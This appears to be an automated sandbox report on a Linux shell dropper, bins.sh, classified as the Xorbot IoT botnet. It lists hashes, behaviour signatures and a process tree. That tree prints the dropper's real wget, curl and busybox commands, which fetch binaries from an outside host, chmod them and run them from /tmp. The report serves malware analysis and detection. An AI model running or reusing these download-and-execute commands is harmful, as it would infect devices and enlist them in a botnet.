Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    30-11-2024 12:44

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    3b645bbe96ee3ab536e8ef1f6ce8697c

  • SHA1

    2917984fd9fed5df87f0aec265284c0eb682b07b

  • SHA256

    63474b961f7d5ce4b87d24a8f75771e3bf67f701db79208330a21c279166a8d3

  • SHA512

    d435bb11992751d59212380b48226e0baf1168a23b2c63f20fdd208027d67695a2901648ebb718dd5fe9008daafb6822f7825e07bc1362bc2e125e9c29b7cac6

  • SSDEEP

    192:YTR16fDzP2B3BHBYBhB9BFY22TjXVR16fDz6B3BHBYBhB9Bt:Y6I22Trc

Malware Config

Signatures

  • Detects Xorbot 2 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 5 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:698
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:701
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:706
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:806
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:808
        • /bin/chmod
          chmod 777 vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq
          2⤵
          • File and Directory Permissions Modification
          PID:809
        • /tmp/vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq
          ./vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq
          2⤵
          • Executes dropped EXE
          PID:810
        • /bin/rm
          rm vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq
          2⤵
            PID:812
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/PmMK7oQitIQRxPag7BUKfC728rVsdJw2pj
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:813
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/PmMK7oQitIQRxPag7BUKfC728rVsdJw2pj
            2⤵
            • Reads runtime system information
            • System Network Configuration Discovery
            PID:814

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/PmMK7oQitIQRxPag7BUKfC728rVsdJw2pj

          Filesize

          112KB

          MD5

          05d7857dcead18bbd86d2935f591873c

          SHA1

          34d18f41ef35f93d5364ce3e24d74730a4e91985

          SHA256

          2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

          SHA512

          d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

        • /tmp/vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq

          Filesize

          117KB

          MD5

          849fa04ef88a8e8de32cb2e8538de5fe

          SHA1

          c768af29fe4b6695fff1541623e8bbd1c6f242f7

          SHA256

          8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579

          SHA512

          2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf